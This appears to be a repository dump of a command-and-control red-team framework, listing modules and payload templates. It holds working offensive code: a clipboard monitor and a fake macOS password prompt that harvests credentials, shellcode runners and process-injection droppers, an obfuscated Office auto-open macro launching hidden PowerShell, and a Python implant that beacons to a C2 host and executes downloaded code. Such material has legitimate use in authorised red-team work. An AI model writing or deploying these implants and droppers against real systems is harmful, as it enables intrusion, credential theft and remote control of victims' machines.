/resources/modules/StandIn.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/StandIn.exe -------------------------------------------------------------------------------- /resources/modules/Steal_token.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Steal_token.exe -------------------------------------------------------------------------------- /resources/modules/StickyNotesExtract.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/StickyNotesExtract.exe -------------------------------------------------------------------------------- /resources/modules/SweetPotato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SweetPotato.exe -------------------------------------------------------------------------------- /resources/modules/SyscallsExtractor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/SyscallsExtractor.exe -------------------------------------------------------------------------------- /resources/modules/Test-ADCredential.ps1: -------------------------------------------------------------------------------- 1 | Function Test-ADCredential 2 | { 3 | Param($username, $password, $domain) 4 | Add-Type -AssemblyName System.DirectoryServices.AccountManagement 5 | $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain 6 | $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain) 7 | $object = New-Object PSObject | Select Username, Password, IsValid 8 | $object.Username = $username; 9 | $object.Password = $password; 10 | $object.IsValid = $pc.ValidateCredentials($username, $password).ToString(); 11 | return $object 12 | } 13 | -------------------------------------------------------------------------------- /resources/modules/TestProxy.ps1: -------------------------------------------------------------------------------- 1 | function TestProxy ($url,$proxy_url,$username,$password) { 2 | $wc = New-Object System.Net.WebClient; 3 | $wp = New-Object System.Net.WebProxy($proxy_url,$true) 4 | $wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") 5 | #$wc.Headers.Add("Referer","") 6 | $wc.Proxy=$wp; 7 | if ($username) { 8 | $PSS = ConvertTo-SecureString $password -AsPlainText -Force; 9 | $getcreds = new-object system.management.automation.PSCredential $username,$PSS; 10 | $wp.Credentials = $getcreds; 11 | } 12 | $wc.downloadstring($url) 13 | } 14 | -------------------------------------------------------------------------------- /resources/modules/WExec.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/WExec.exe -------------------------------------------------------------------------------- /resources/modules/Watson.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Watson.exe -------------------------------------------------------------------------------- /resources/modules/clipboard.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/clipboard.exe -------------------------------------------------------------------------------- /resources/modules/clipboard_monitor.js: -------------------------------------------------------------------------------- 1 | function clipRun(runTime){ 2 | ObjC.import('AppKit'); 3 | let cboard = []; 4 | let pb = $.NSPasteboard.generalPasteboard; 5 | let count = 0; 6 | //console.log(count); 7 | for (let i = 0; i < runTime; i++){ 8 | //console.log(pb.changeCount); 9 | if (count < pb.changeCount){ 10 | //console.log("New data on clipboard!: "); 11 | //console.log(pb.stringForType("NSStringPboardType").js); 12 | cboard.push(pb.stringForType("NSStringPboardType").js); 13 | count = pb.changeCount; 14 | } 15 | $.NSThread.sleepForTimeInterval(1); 16 | } 17 | return cboard.toString(); 18 | } 19 | let runTime = %s; 20 | clipRun(runTime); -------------------------------------------------------------------------------- /resources/modules/cred-popper.js: -------------------------------------------------------------------------------- 1 | function prompter(title, text, icon){ 2 | let app = Application.currentApplication() 3 | app.includeStandardAdditions = true 4 | let prompt = app.displayDialog(text, {defaultAnswer: "", buttons: ["OK", "Cancel"], defaultButton: "OK", cancelButton: "Cancel", withTitle: title, withIcon: Path(icon), hiddenAnswer: true }); 5 | let pass = prompt.textReturned; 6 | // If running BigSur, testing the pass is not yet working... 7 | let osVer = ObjC.deepUnwrap($.NSProcessInfo.processInfo.operatingSystemVersionString.js); 8 | if (osVer.includes("11.")){ 9 | return pass; 10 | }else{ 11 | testPass(pass); 12 | } 13 | } 14 | function testPass(pass){ 15 | ObjC.import('Collaboration'); 16 | ObjC.import('CoreServices'); 17 | let cu = ObjC.deepUnwrap($.NSProcessInfo.processInfo.userName); 18 | let authority = $.CBIdentityAuthority.defaultIdentityAuthority; 19 | let username = cu; 20 | let password = pass; 21 | let user = $.CBIdentity.identityWithNameAuthority(username, authority); 22 | if(user.js !== undefined){ 23 | if(user.authenticateWithPassword(password)){ 24 | console.log("Successful authentication"); 25 | return password; 26 | } 27 | else{ 28 | prompter(title, text, icon); 29 | } 30 | } 31 | else{ 32 | console.log("User does not exist"); 33 | } 34 | } 35 | 36 | var title = "%s"; 37 | var text = "%s"; 38 | var icon = "%s"; 39 | prompter(title, text, icon) 40 | -------------------------------------------------------------------------------- /resources/modules/dcom.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/dcom.exe -------------------------------------------------------------------------------- /resources/modules/token.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/token.exe -------------------------------------------------------------------------------- /resources/payload-templates/DynamicCode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | 4 | namespace PoshC2DynamicCode { 5 | 6 | public class Program 7 | { 8 | 9 | public static void Main(string[] args){ 10 | // Code goes here, e.g: 11 | Console.WriteLine("Dynamic Code executed successfully"); 12 | } 13 | 14 | } 15 | 16 | } -------------------------------------------------------------------------------- /resources/payload-templates/Sharp_Powershell_Runner.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Diagnostics; 4 | using System.Reflection; 5 | using System.Runtime.InteropServices; 6 | using System.Collections.ObjectModel; 7 | using System.Management.Automation; 8 | using System.Management.Automation.Runspaces; 9 | 10 | public class Program 11 | { 12 | [DllImport("kernel32.dll")] static extern IntPtr GetConsoleWindow(); 13 | [DllImport("user32.dll")] static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); 14 | [DllImport("kernel32.dll")] static extern IntPtr GetCurrentThread(); 15 | [DllImport("kernel32.dll")] static extern bool TerminateThread(IntPtr hThread, uint dwExitCode); 16 | 17 | public const int SW_HIDE = 0; 18 | public const int SW_SHOW = 5; 19 | public static string basepayload = "#REPLACEME#"; 20 | public static IntPtr DllBaseAddress = IntPtr.Zero; 21 | 22 | public Program() { 23 | try 24 | { 25 | string tt = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(basepayload)); 26 | InvokeAutomation(tt); 27 | } 28 | catch 29 | { 30 | Main(); 31 | } 32 | } 33 | public static string InvokeAutomation(string cmd) 34 | { 35 | Runspace newrunspace = RunspaceFactory.CreateRunspace(); 36 | newrunspace.Open(); 37 | 38 | // transcript evasion 39 | RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace); 40 | var cmdin = new System.Management.Automation.PSVariable("c"); 41 | newrunspace.SessionStateProxy.PSVariable.Set(cmdin); 42 | var output = new System.Management.Automation.PSVariable("o"); 43 | newrunspace.SessionStateProxy.PSVariable.Set(output); 44 | 45 | Pipeline pipeline = newrunspace.CreatePipeline(); 46 | newrunspace.SessionStateProxy.SetVariable("c", cmd); 47 | pipeline.Commands.AddScript("$o = IEX $c | Out-String"); 48 | Collection results = pipeline.Invoke(); 49 | newrunspace.Close(); 50 | 51 | StringBuilder stringBuilder = new StringBuilder(); 52 | foreach (PSObject obj in results) 53 | { 54 | stringBuilder.Append(obj); 55 | } 56 | return stringBuilder.ToString().Trim(); 57 | } 58 | public static void Sharp(long callbackFunc = 0, long baseAddress = 0) 59 | { 60 | DllBaseAddress = new IntPtr(baseAddress); 61 | var handle = GetConsoleWindow(); 62 | ShowWindow(handle, SW_HIDE); 63 | try 64 | { 65 | string cmd = Encoding.UTF8.GetString(System.Convert.FromBase64String(basepayload)); 66 | InvokeAutomation(cmd); 67 | } 68 | catch { } 69 | var x = GetCurrentThread(); 70 | TerminateThread(x, 0); 71 | 72 | } 73 | public static void Main() 74 | { 75 | Sharp(); 76 | } 77 | } -------------------------------------------------------------------------------- /resources/payload-templates/System.Management.Automation.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/payload-templates/System.Management.Automation.dll -------------------------------------------------------------------------------- /resources/payload-templates/csc.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Reflection; 3 | using System.Diagnostics; 4 | using System.Configuration.Install; 5 | using System.Runtime.InteropServices; 6 | using System.Threading; 7 | 8 | class Program 9 | { 10 | [Flags()] 11 | public enum AllocationType : uint 12 | { 13 | COMMIT = 0x1000, 14 | RESERVE = 0x2000, 15 | RESET = 0x80000, 16 | LARGE_PAGES = 0x20000000, 17 | PHYSICAL = 0x400000, 18 | TOP_DOWN = 0x100000, 19 | WRITE_WATCH = 0x200000 20 | } 21 | 22 | public enum Protection 23 | { 24 | PAGE_NOACCESS = 0x01, 25 | PAGE_READONLY = 0x02, 26 | PAGE_READWRITE = 0x04, 27 | PAGE_WRITECOPY = 0x08, 28 | PAGE_EXECUTE = 0x10, 29 | PAGE_EXECUTE_READ = 0x20, 30 | PAGE_EXECUTE_READWRITE = 0x40, 31 | PAGE_EXECUTE_WRITECOPY = 0x80, 32 | PAGE_GUARD = 0x100, 33 | PAGE_NOCACHE = 0x200, 34 | PAGE_WRITECOMBINE = 0x400 35 | } 36 | 37 | [DllImport("kernel32.dll", SetLastError=true)] 38 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect); 39 | 40 | [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 41 | static extern IntPtr CreateThread( 42 | IntPtr lpThreadAttributes, 43 | uint dwStackSize, 44 | IntPtr lpStartAddress, 45 | IntPtr lpParameter, 46 | uint dwCreationFlags, 47 | out uint lpThreadId); 48 | 49 | [DllImport("kernel32.dll", SetLastError = true)] 50 | static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect); 51 | 52 | static void Main(string[] args) 53 | { 54 | byte[] shell = null; 55 | 56 | string safdsv64 = "#REPLACEME64#"; 57 | string safdsv32 = "#REPLACEME32#"; 58 | 59 | if (IntPtr.Size == 4) 60 | { 61 | // 32-bit sc 62 | shell = Convert.FromBase64String(safdsv32); 63 | } 64 | else if (IntPtr.Size == 8) 65 | { 66 | // 64-bit sc 67 | shell = Convert.FromBase64String(safdsv64); 68 | } 69 | 70 | IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE); 71 | 72 | if(mem != IntPtr.Zero) 73 | { 74 | uint oldProt = 0; 75 | uint threadId = 0; 76 | Marshal.Copy(shell, 0, mem, shell.Length); 77 | VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt); 78 | CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId); 79 | WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset); 80 | wh.WaitOne(); 81 | } 82 | } 83 | 84 | } 85 | -------------------------------------------------------------------------------- /resources/payload-templates/dropper: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/payload-templates/dropper -------------------------------------------------------------------------------- /resources/payload-templates/dropper.c: -------------------------------------------------------------------------------- 1 | #define WINVER 0x0501 2 | 3 | #include 4 | 5 | #REPLACEME# 6 | 7 | void pump(DWORD); 8 | 9 | int main(int argc, char *argv[]) 10 | { 11 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 12 | si.cb = sizeof(si); 13 | si.dwFlags = STARTF_USESHOWWINDOW; 14 | si.wShowWindow = SW_HIDE; 15 | PROCESS_INFORMATION pi= {0}; 16 | int processID = GetCurrentProcessId(); 17 | pump(processID); 18 | while(1) {Sleep(50000);} 19 | return 0; 20 | } 21 | 22 | 23 | void pump(DWORD dwProcessID) { 24 | HANDLE hProc; 25 | HANDLE hRemoteThread; 26 | PVOID pRemoteBuffer; 27 | 28 | if(!dwProcessID) { 29 | exit(0); 30 | } 31 | hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID); 32 | if(!hProc) { 33 | exit(0); 34 | } 35 | pRemoteBuffer = VirtualAllocEx(hProc, NULL, sizeof(sc)*2, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | if (!pRemoteBuffer) { 37 | exit(0); 38 | } 39 | if (!WriteProcessMemory(hProc, pRemoteBuffer, sc, sizeof(sc), NULL)) { 40 | exit(0); 41 | } 42 | CreateRemoteThread(hProc, NULL, 0, pRemoteBuffer, NULL, 0, NULL); 43 | CloseHandle(hProc); 44 | } 45 | -------------------------------------------------------------------------------- /resources/payload-templates/dropper.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | Microsoft HTA 4 | 5 | 6 | 7 | 8 | 9 | 10 | 16 | 17 | 18 | 19 | 23 | 28 | 29 | 40 |
41 |
42 |
43 | 44 | 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /resources/payload-templates/dropper.macro: -------------------------------------------------------------------------------- 1 | Sub Auto_Open() 2 | UpdateMacro 3 | End Sub 4 | 5 | Sub AutoOpen() 6 | UpdateMacro 7 | End Sub 8 | 9 | Sub Workbook_Open() 10 | UpdateMacro 11 | End Sub 12 | 13 | Sub WorkbookOpen() 14 | UpdateMacro 15 | End Sub 16 | 17 | Sub Document_Open() 18 | UpdateMacro 19 | End Sub 20 | 21 | Sub DocumentOpen() 22 | UpdateMacro 23 | End Sub 24 | 25 | Sub UpdateMacro() 26 | Dim str, exec 27 | 28 | #REPLACEME# 29 | 30 | exec = "p" 31 | exec = exec + "o" 32 | exec = exec + "w" 33 | exec = exec + "e" 34 | exec = exec + "r" 35 | exec = exec + "s" 36 | exec = exec + "h" 37 | exec = exec + "e" 38 | exec = exec + "l" 39 | exec = exec + "l" 40 | exec = exec + "." 41 | exec = exec + "e" 42 | exec = exec + "x" 43 | exec = exec + "e" 44 | exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str 45 | 46 | Shell(exec) 47 | End Sub 48 | -------------------------------------------------------------------------------- /resources/payload-templates/dropper.py: -------------------------------------------------------------------------------- 1 | import os,sys,base64,ssl,socket,pwd,hashlib,time 2 | try:import urllib.request as urllib2 3 | except:import urllib2 4 | kdn=time.strptime("#REPLACEKILLDATE#","%Y-%m-%d") 5 | pyhash="#REPLACEPYTHONHASH#" 6 | pykey="#REPLACESPYTHONKEY#" 7 | key="#REPLACEKEY#" 8 | serverclean=[#REPLACEHOSTPORT#] 9 | urlid="#REPLACEURLID#" 10 | url=serverclean[0]+"#REPLACEQUICKCOMMAND#" 11 | url2=serverclean[0]+"#REPLACECONNECTURL#" 12 | hh=[#REPLACEDOMAINFRONT#] 13 | ua="#REPLACEUSERAGENT#" 14 | cstr=time.strftime("%Y-%m-%d",time.gmtime());cstr=time.strptime(cstr,"%Y-%m-%d") 15 | # This doesn't exist in python < 2.7.9 16 | if sys.version_info[0] == 3 or (sys.version_info[0] == 2 and sys.version_info[1] >= 7 and sys.version_info[2] >= 9): 17 | ssl._create_default_https_context=ssl._create_unverified_context 18 | if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua}) 19 | else: r=urllib2.Request(url,headers={'User-agent':ua}) 20 | res=urllib2.urlopen(r);d=res.read(); 21 | try:b=bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8");s=hashlib.sha512(b.encode("utf-8")).hexdigest() 22 | except:c=d[1:];b=c.decode("hex");s=hashlib.sha512(b).hexdigest() 23 | if pykey in b and pyhash == s and cstr < kdn: 24 | try:exec(bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8")) 25 | except:exec(b) 26 | else: sys.exit(0) 27 | un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid();pname="NA" 28 | is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86') 29 | hn=socket.gethostname();o=urllib2.build_opener() 30 | encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid)) 31 | if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode("utf-8")}) 32 | else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode("utf-8")}) 33 | request = urllib2.Request(url2, headers=headers);response = urllib2.urlopen(request); 34 | html = response.read().decode('utf-8');x=decrypt(key, html) 35 | exec(base64.b64decode(x)) 36 | un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid();procname="python" 37 | is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86') 38 | hn=socket.gethostname();o=urllib2.build_opener() 39 | encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid)) 40 | if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid}) 41 | else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid}) 42 | res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\0'); 43 | exec(base64.b64decode(x)) 44 | -------------------------------------------------------------------------------- /resources/payload-templates/dropper.xor: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #REPLACEME# 4 | 5 | void XOR(char* cipher, size_t cipher_len, char* key, size_t key_len) { 6 | for (int x = 0; x < cipher_len; x++) 7 | { 8 | cipher[x] ^= key[x % key_len]; 9 | } 10 | cipher[cipher_len] = 0; 11 | } 12 | 13 | void migrate(DWORD); 14 | 15 | 16 | int main(int argc, char *argv[]) 17 | { 18 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 19 | si.cb = sizeof(si); 20 | si.dwFlags = STARTF_USESHOWWINDOW; 21 | si.wShowWindow = SW_HIDE; 22 | PROCESS_INFORMATION pi= {0}; 23 | int processID = GetCurrentProcessId(); 24 | 25 | #REPLACE_XOR_KEY# 26 | XOR((char*)sc, sizeof(sc), key, sizeof(key)); 27 | 28 | migrate(processID); 29 | while(1) {Sleep(50000);} 30 | return 0; 31 | } 32 | 33 | 34 | void migrate(DWORD dwProcessID) { 35 | HANDLE hP; 36 | HANDLE hRT; 37 | PVOID pRB; 38 | 39 | DWORD opr = PAGE_READWRITE; 40 | BOOL vp; 41 | 42 | if(!dwProcessID) { 43 | exit(0); 44 | } 45 | hP = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID); 46 | if(!hP) { 47 | exit(0); 48 | } 49 | pRB = VirtualAllocEx(hP, NULL, sizeof(sc), MEM_COMMIT, PAGE_READWRITE); 50 | //pRB = VirtualAllocEx(hP, NULL, sizeof(sc), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 51 | if (!pRB) { 52 | exit(0); 53 | } 54 | vp = VirtualProtect(pRB, sizeof(sc), PAGE_EXECUTE_READWRITE, &opr); 55 | if (vp){ 56 | if (!WriteProcessMemory(hP, pRB, sc, sizeof(sc), NULL)) { 57 | exit(0); 58 | } 59 | CreateRemoteThread(hP, NULL, 0, pRB, NULL, 0, NULL); 60 | CloseHandle(hP); 61 | } 62 | } -------------------------------------------------------------------------------- /resources/payload-templates/dropper_cs.sct: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /resources/payload-templates/dropper_migrate.c: -------------------------------------------------------------------------------- 1 | #define WINVER 0x0501 2 | 3 | #include 4 | 5 | #REPLACEME# 6 | 7 | void pump(DWORD); 8 | 9 | int main(int argc, char *argv[]) 10 | { 11 | int x = atoi(argv[1]); 12 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 13 | si.cb = sizeof(si); 14 | si.dwFlags = STARTF_USESHOWWINDOW; 15 | si.wShowWindow = SW_HIDE; 16 | PROCESS_INFORMATION pi= {0}; 17 | 18 | if (x > 0) 19 | { 20 | pump(x); 21 | } else { 22 | BOOL bSuccess = FALSE; 23 | DWORD dwPid = 0; 24 | bSuccess = CreateProcess(NULL, "#REPLACEMEPROCESS#", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); 25 | if (bSuccess) 26 | { 27 | dwPid = GetProcessId(pi.hProcess); 28 | pump(dwPid); 29 | } 30 | } 31 | return 0; 32 | } 33 | 34 | 35 | void pump(DWORD dwProcessID) { 36 | HANDLE hProc; 37 | HANDLE hRemoteThread; 38 | PVOID pRemoteBuffer; 39 | 40 | if(!dwProcessID) { 41 | exit(0); 42 | } 43 | hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID); 44 | if(!hProc) { 45 | exit(0); 46 | } 47 | pRemoteBuffer = VirtualAllocEx(hProc, NULL, sizeof(sc)*2, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 48 | if (!pRemoteBuffer) { 49 | exit(0); 50 | } 51 | if (!WriteProcessMemory(hProc, pRemoteBuffer, sc, sizeof(sc), NULL)) { 52 | exit(0); 53 | } 54 | CreateRemoteThread(hProc, NULL, 0, pRemoteBuffer, NULL, 0, NULL); 55 | CloseHandle(hProc); 56 | } -------------------------------------------------------------------------------- /resources/payload-templates/dropper_rg.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 7 | 8 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /resources/payload-templates/msbuild.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | <#REPLACEMERANDSTRING# /> 4 | 5 | 9 | 10 | 11 | 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/Comms.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | internal interface IComms : IDisposable 4 | { 5 | string GetCommands(); 6 | void SendTaskOutputString(string taskId, string data); 7 | void SendTaskOutputBytes(string taskId, byte[] data); 8 | string Stage(string environmentalInfo); 9 | } -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/ERROR_CODES.txt: -------------------------------------------------------------------------------- 1 | 0x0001: CommandLineToArgvW returned nullptr 2 | 0x0002: Unexpected beacon time unit (Expected s for seconds, m for minutes or h for hours) 3 | 0x0003: GetLoadedType error 4 | 0x0004: Decrypted primer response is null 5 | 0x0005: Every comms channel failed 6 | 0x0006: Invalid loadmodule string, expected two args separated by a space 7 | 0x0007: Module run but not loaded 8 | 0x0008: Split config string has invalid length 9 | 0x0009: RunTempAppDomain Sleeve function is null 10 | 0x0010: RunTempAppDomain Ace function is null 11 | 0x0011: RunTempAppDomain invocation errored 12 | 0x0012: FComm could not resolve directory for file 13 | 0x0013: FComm could not create FComm file -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/Encryption.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Security.Cryptography; 3 | using System.Text; 4 | 5 | internal static class Encryption 6 | { 7 | internal static string Encrypt(string key, string plaintext, bool gzip = false) 8 | { 9 | return Encrypt(key, Encoding.UTF8.GetBytes(plaintext), gzip); 10 | } 11 | 12 | internal static string Encrypt(string key, byte[] plaintext, bool gzip = false) 13 | { 14 | if (gzip) 15 | plaintext = Utils.Compress(plaintext); 16 | 17 | try 18 | { 19 | var algorithm = CreateAlgorithm(key, null); 20 | var cipherText = algorithm.CreateEncryptor().TransformFinalBlock(plaintext, 0, plaintext.Length); 21 | return Convert.ToBase64String(Utils.Combine(algorithm.IV, cipherText)); 22 | } 23 | catch 24 | { 25 | var cipher = CreateAlgorithm(key, null, false); 26 | var cipherText = cipher.CreateEncryptor().TransformFinalBlock(plaintext, 0, plaintext.Length); 27 | return Convert.ToBase64String(Utils.Combine(cipher.IV, cipherText)); 28 | } 29 | } 30 | 31 | private static byte[] Decrypt(string key, byte[] ciphertext) 32 | { 33 | var iv = new byte[16]; 34 | Array.Copy(ciphertext, iv, 16); 35 | try 36 | { 37 | var cipher = CreateAlgorithm(key, Convert.ToBase64String(iv)); 38 | return cipher.CreateDecryptor().TransformFinalBlock(ciphertext, 16, ciphertext.Length - 16); 39 | } 40 | catch 41 | { 42 | var cipher = CreateAlgorithm(key, Convert.ToBase64String(iv), false); 43 | return cipher.CreateDecryptor().TransformFinalBlock(ciphertext, 16, ciphertext.Length - 16); 44 | } 45 | finally 46 | { 47 | Array.Clear(ciphertext, 0, ciphertext.Length); 48 | Array.Clear(iv, 0, 16); 49 | } 50 | } 51 | 52 | internal static byte[] Decrypt(string key, string base64EncodedCiphertext) 53 | { 54 | var ciphertext = Convert.FromBase64String(base64EncodedCiphertext); 55 | return Decrypt(key, ciphertext); 56 | } 57 | 58 | private static SymmetricAlgorithm CreateAlgorithm(string key, string iv, bool useRijndael = true) 59 | { 60 | SymmetricAlgorithm algorithm; 61 | if (useRijndael) 62 | algorithm = new RijndaelManaged(); 63 | else 64 | algorithm = new AesCryptoServiceProvider(); 65 | 66 | algorithm.Mode = CipherMode.CBC; 67 | algorithm.Padding = PaddingMode.Zeros; 68 | algorithm.BlockSize = 128; 69 | algorithm.KeySize = 256; 70 | 71 | if (null != iv) 72 | algorithm.IV = Convert.FromBase64String(iv); 73 | else 74 | algorithm.GenerateIV(); 75 | 76 | if (null != key) 77 | algorithm.Key = Convert.FromBase64String(key); 78 | 79 | return algorithm; 80 | } 81 | } -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/Internals.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | internal static class Internals 5 | { 6 | internal const int PAGE_EXECUTE_READWRITE = 0x40; 7 | 8 | [DllImport("kernel32.dll")] 9 | internal static extern IntPtr GetCurrentThread(); 10 | 11 | [DllImport("kernel32.dll")] 12 | internal static extern bool TerminateThread(IntPtr hThread, uint dwExitCode); 13 | 14 | [DllImport("kernel32.dll")] 15 | internal static extern IntPtr GetConsoleWindow(); 16 | 17 | [DllImport("shell32.dll")] 18 | internal static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs); 19 | 20 | [DllImport("user32.dll")] 21 | internal static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); 22 | 23 | [DllImport("kernel32.dll", SetLastError = true)] 24 | internal static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 25 | 26 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 27 | internal delegate void CallBack( 28 | [MarshalAs(UnmanagedType.LPWStr)] string appDomainName, 29 | [MarshalAs(UnmanagedType.LPArray)] byte[] data, 30 | int len, 31 | [MarshalAs(UnmanagedType.LPArray)] byte[] echoAssembly, 32 | int echoAssemblyLength, 33 | [MarshalAs(UnmanagedType.LPWStr)] string className, 34 | [MarshalAs(UnmanagedType.LPWStr)] string entryPoint, 35 | int argsLength, 36 | [MarshalAs(UnmanagedType.LPWStr)] string argsString, 37 | out int output, 38 | out IntPtr outputStringIntPtr); 39 | } -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.InteropServices; 3 | 4 | // General Information about an assembly is controlled through the following 5 | // set of attributes. Change these attribute values to modify the information 6 | // associated with an assembly. 7 | [assembly: AssemblyTitle("System.Config.Manager.exe")] 8 | [assembly: AssemblyDescription("")] 9 | [assembly: AssemblyConfiguration("")] 10 | [assembly: AssemblyCompany("")] 11 | [assembly: AssemblyProduct("Config Manager")] 12 | [assembly: AssemblyCopyright("Copyright © 2021")] 13 | [assembly: AssemblyTrademark("")] 14 | [assembly: AssemblyCulture("")] 15 | 16 | // Setting ComVisible to false makes the types in this assembly not visible 17 | // to COM components. If you need to access a type in this assembly from 18 | // COM, set the ComVisible attribute to true on that type. 19 | [assembly: ComVisible(false)] 20 | 21 | // The following GUID is for the ID of the typelib if this project is exposed to COM 22 | [assembly: Guid("D04EC694-31D4-4075-9E29-1650D6477AD3")] 23 | 24 | // Version information for an assembly consists of the following four values: 25 | // 26 | // Major Version 27 | // Minor Version 28 | // Build Number 29 | // Revision 30 | // 31 | // You can specify all the values or you can default the Build and Revision Numbers 32 | // by using the '*' as shown below: 33 | // [assembly: AssemblyVersion("1.0.*")] 34 | [assembly: AssemblyVersion("1.0.0.0")] 35 | [assembly: AssemblyFileVersion("1.0.0.0")] -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/README.md: -------------------------------------------------------------------------------- 1 | # Sharp Dropper 2 | 3 | This project is the C# Dropper. It can be opened as a solution for ease of dev but note that Posh will not build the 4 | solution only using `mingw` to build `Program.cs`, so changes to the project/solution files only affect development. 5 | 6 | ## Error codes 7 | 8 | The project uses error codes instead of messages, these are stored in ERROR_CODES.txt. 9 | 10 | ## Config 11 | 12 | The config has the format: 13 | 14 | ``` 15 | 